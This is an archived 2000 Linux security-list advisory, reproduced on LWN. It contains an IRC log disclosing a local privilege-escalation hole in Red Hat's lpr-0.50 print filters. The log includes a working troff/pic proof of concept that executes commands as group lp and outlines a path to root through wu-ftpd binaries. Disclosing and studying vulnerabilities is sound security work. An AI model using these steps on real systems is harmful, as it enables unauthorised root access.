![[LWN Logo]](/images/lcorner.png) |
|
![[Timeline]](/images/Included.png) |
Date: Thu, 26 Oct 2000 15:14:41 -0600
From: Kurt Seifried <seifried@SECURITYPORTAL.COM>
Subject: LSLID:2000102605 - lpr
To: LINUX-SECURITY@LISTSERV.SECURITYPORTAL.COM
LSLID:2000102605
==================
details of an exploit agains lpr-0.50-4 (at least)
(also affects other systems that may have the same print filters)
URL : http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt
AFFECTS : lpr-0.50-4 & earlier
SEVERITY : local ROOT possible.
SYNOPSIS : escalation of group permissions, leading to
exploit for every user except root is available.
root is sometimes available as well.
(wu-ftpd-2.6.0-14.6x binaries are owned by user
bin, and can be overwritten allowing root access
if wu-ftpd is installed.)
http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt
This is a log of an advisory given in channel
#roothat on irc.pulltheplug.com, October 16 2000.
!!!!!!!!!!!!!!!!!!!!!!!! start of log !!!!!!!!!!!!!!!!!!!!!!!
--> zen-parse (~empathy@p25-max6.dun.ihug.co.nz) has joined #roothat
--- Topic for #roothat is welcome to #roothat -- trivia in #trivia -- root yer
printer and j00 get a new group of friends. and stuff.
--- Topic for #roothat set by zen-parse at Sun Oct 15 01:26:35 2000
--- noid gives channel operator status to zen-parse
<bdev> hey zen
<Safety> zen-parse
<Safety> lockdown
<zen-parse> lo all
<bdev> what's this topic all about then zen?
<zen-parse> new hole in lpr package for redhat
<bdev> and...
<bdev> ;]
<bdev> you releasing it ?
--> possem (star@203-173-242-165.nzl.ihugultra.co.nz) has joined #roothat
<zen-parse> [zen@continuity /tmp]$ id
<zen-parse> uid=500(zen) gid=500(zen) groups=500(zen)
<zen-parse> [zen@continuity /tmp]$ cat asdf
<zen-parse> .PS
<zen-parse> sh D/usr/bin/id>/tmp/yougetanyideasyetD
<zen-parse> .PF
<zen-parse> [zen@continuity /tmp]$ lpr asdf
<zen-parse> [zen@continuity /tmp]$ ls /tmp/yougetanyideasyet;cat /tmp/yougetany
ideasyet
<zen-parse> uid=500(zen) gid=500(zen) groups=7(lp)
<zen-parse> [zen@continuity /tmp]$
<zen-parse> consider it released
<zen-parse> erm... missing a line...
<bdev> heh
<zen-parse> and should be ls -al /tmp/yougetanyideasyet;cat /tmp/yougetanyideas
yet
<zen-parse> -rw-rw-rw- 1 zen zen 39 Oct 16 22:08 /tmp/yougeta
nyideasyet
<zen-parse> as the output
<bdev> only gid lp ?
<Remmy> ehm
<Remmy> heh
<bdev> but: -r-sr-sr-x 1 root lp 16292 Jan 10 2000 /usr/bin/lpr
*
<-- schematic|ZzZz has quit (Ping timeout)
<zen-parse> thats not where the magic happens though.
<zen-parse> ;]
<zen-parse> needs a running lpd
<zen-parse> and a printer that does troff
<zen-parse> eg: PostScript
<zen-parse> cat /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<Remmy> zen...write a bugtraq advisory
<Remmy> but get really really stoned first.
<Remmy> hehe
<zen-parse> `grog -Tps -msafer $TMP_FILE`
<zen-parse> log this... use this as an advisory. ;]
<zen-parse> that is where the magic happens.
<zen-parse> grog is a perl script that selects the correct command line options
for groff. groff can, if asked run a variety of other programs, such as eqn(fo
r equations) tbl(for tables) and pic(for compiling pictures).
<zen-parse> the -msafer means to disallow the call to any dangerous functions,
such as executing a command or creating or modifying a file.
<zen-parse> However pic is called without that option being passed, even though
it does have a -S switch, which runs it in safer mode.
<possem> zen-parse
<zen-parse> The lpd checks what type of file the file is
<zen-parse> with a program called file
<bdev> hmm
<Remmy> looks perty yummy
<zen-parse> the type of this file is troff or preprocessor...
<-- possem has quit (Quit: )
<zen-parse> so the daemon then it hands it to the apropriate filters to print,
one of them being /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<zen-parse> which contains the grog command, which causes groff to run pic on t
he file, and pic executes the file we speciify as the user the file was printed
by.
<zen-parse> with one exception.
<zen-parse> you have been set to have a list of groups which just contains one
group. lp
<Remmy> hmm
<zen-parse> (btw: group lp can edit all the configuration files for lpd. lpd ca
n run the commands as any user (except root).
<zen-parse> however, if u have wuftpd installed, there is a root exploit.
<zen-parse> -rwxr-xr-x 1 bin bin 162608 Oct 14 19:36 /usr/sbin/in
.ftpd
<zen-parse> lrwxrwxrwx 1 bin bin 7 Sep 23 02:30 /usr/sbin/wu
.ftpd -> in.ftpd
<zen-parse> gain user bin, and copy /bin/sh over in.ftpd
<Remmy> heh
<zen-parse> telnet to port 21, and you have root. so it is a root exploit on sy
stems with wufptd. and just every other uid on systems with lpd runnning.
<zen-parse> )
<bdev> heh, nice
<zen-parse> there also appears to be an error file attempting to be made just a
fter priviledges are dropped, but it has insuficient writes at that moment to a
ctually succeed. the directory is owned by root, and only has lp write access b
ecause the lpd runs as root.
<zen-parse> um. you dats my advisory ;]
--- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown
@noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D
<zen-parse> -- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|a
fk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D
<Remmy> ew
<zen-parse> -- zen-parse ;]
<Remmy> hehe
<Remmy> i lik eyer bigtraq posts better...
<Remmy> ya get all the leeto ascii in there and all...
<zen-parse> ok... now ima save the buffer and submit it to bugtraq ;]
<bdev> kewl
--> ThaReaper (Sir_Vomit@1Cust33.tnt50.chi5.da.uu.net) has joined #roothat
<bdev> that'd be a cool advisory
!!!!!!!!!!!!!!!!!!!!!!!!!! end of log !!!!!!!!!!!!!!!!!!!!!!!
Ob-ASCII
/\/\ mee-errraaAAgghhhraher!
= oo = /
\()/ /
/ __ \
|| ||
in memory of
lucky.
Send someone a cool Dynamitemail flashcard greeting!! And get rewarded.
GO AHEAD! http://cards.dynamitemail.com/index.php3?rid=fc-41